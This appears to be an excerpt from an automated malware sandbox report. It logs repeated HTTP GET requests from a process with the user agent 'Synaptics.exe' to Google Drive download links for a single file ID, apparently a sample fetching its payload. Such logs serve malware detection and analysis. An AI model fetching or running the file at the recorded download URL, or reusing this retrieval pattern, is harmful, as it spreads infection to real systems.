                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=nQ2TbwCw_ds2rWzTR5JkIhluelcY1MRCn-c4_sKdsONDCNospwJyv_xrPNwxBWcQxJh_t8gLmPoB0GrqaOcT2kGisWQMB7I_oTKoKoiThmmpcu7c574eVS0LqYPkHz7iwfqb4ioYh3zYigsn6oOTvDlpPI3vch8zq2ouTiIP1UVQX5HNFuArwxUL
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=nQ2TbwCw_ds2rWzTR5JkIhluelcY1MRCn-c4_sKdsONDCNospwJyv_xrPNwxBWcQxJh_t8gLmPoB0GrqaOcT2kGisWQMB7I_oTKoKoiThmmpcu7c574eVS0LqYPkHz7iwfqb4ioYh3zYigsn6oOTvDlpPI3vch8zq2ouTiIP1UVQX5HNFuArwxUL
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=nQ2TbwCw_ds2rWzTR5JkIhluelcY1MRCn-c4_sKdsONDCNospwJyv_xrPNwxBWcQxJh_t8gLmPoB0GrqaOcT2kGisWQMB7I_oTKoKoiThmmpcu7c574eVS0LqYPkHz7iwfqb4ioYh3zYigsn6oOTvDlpPI3vch8zq2ouTiIP1UVQX5HNFuArwxUL
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=a_A08qj7AGhwYqYPAOUWBkXuJ3nCaJEFYO5HVpg_5f_J1SpytpXqqhYmA1eULkde7NfijU2zmayf_NNrPC0XAFhoBP3NP0kzjHQ4bF2OTU18bYRtTCWpd_lRmIQiW4WcKJPz9LIuQjeL-zxZJGxrAe8xrIjEX0fLr6U4UULYJOmBGT9tLThE2bOr
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
